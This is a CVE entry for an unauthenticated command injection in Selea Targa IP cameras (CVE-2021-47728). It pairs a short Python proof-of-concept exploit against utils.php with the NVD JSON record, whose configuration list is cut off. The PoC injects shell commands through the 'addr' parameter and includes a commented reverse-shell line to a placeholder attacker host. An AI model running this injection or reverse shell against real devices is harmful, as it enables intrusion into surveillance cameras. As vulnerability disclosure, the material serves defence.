CVE-2021-47728

import requests # CVE-2021-47728 PoC - Selea Targa IP Camera Unauthenticated Command Injection # Target: Selea Targa IP OCR-ANPR Camera # Vulnerability: Command Injection in utils.php via 'addr' and 'port' parameters TARGET = "http://target-ip:80" def exploit(target, cmd): """Execute command injection via addr parameter""" payload = f";{cmd};" params = { 'addr': payload, 'port': '80' } try: response = requests.get(f"{target}/utils.php", params=params, timeout=10) return response.text except Exception as e: return f"Error: {str(e)}" # Example usage - check if vulnerable if __name__ == "__main__": # Test basic command injection result = exploit(TARGET, "id") print(result) # Reverse shell example (attacker needs listener) # exploit(TARGET, "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")

{"cve": {"id": "CVE-2021-47728", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:51.243", "lastModified": "2026-02-23T19:00:13.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Selea Targa IP OCR-ANPR Camera contains an unauthenticated command injection vulnerability in utils.php that allows remote attackers to execute arbitrary shell commands. Attackers can exploit the 'addr' and 'port' parameters to inject commands and gain www-data user access through chained local file inclusion techniques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:selea:izero_box_full_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "3BC5F782-F358-4E13-88CD-8AF6F631D136"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:selea:izero_box_full:-:*:*:*:*:*:*:*", "matchCriteriaId": "8736E8B4-238F-4BB9-900A-44D34AEEA244"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:selea:izero_column_entry\\/8_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A73F7A2-DCD9-42F1-93AE-147703747B9E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:selea:izero_column_entry\\/8:-:*:*:*:*:*:*:*", "matchCriteriaId": "003FFAA4-87FC-4CA1-B0F7-A4DC1FD8F6AE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:selea:izero_column_full\\/8_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "992C33A2-04E4-481D-A336-3850D0A823EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:selea:izero_column_full\\/8:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F62AF0A-B754-4DCF-A6B1-34DCEB11B090"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:selea:targa_504_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "55482174-E8FD-4003-BABE-A195484C79F9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:selea:targa_504:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FB2771E-91E8-45C7-9EB2-D84B46F6802D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:selea:targa_512_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C4451B5-C9EB-4A7E-8D9A-6F5AA66F43BA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:selea:targa_512:-:*:*:*:*:*:*:*", "matchCriteriaId": "22626DE4-BB35-49C9-803B-29B6E017CA02"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch" ... (truncated)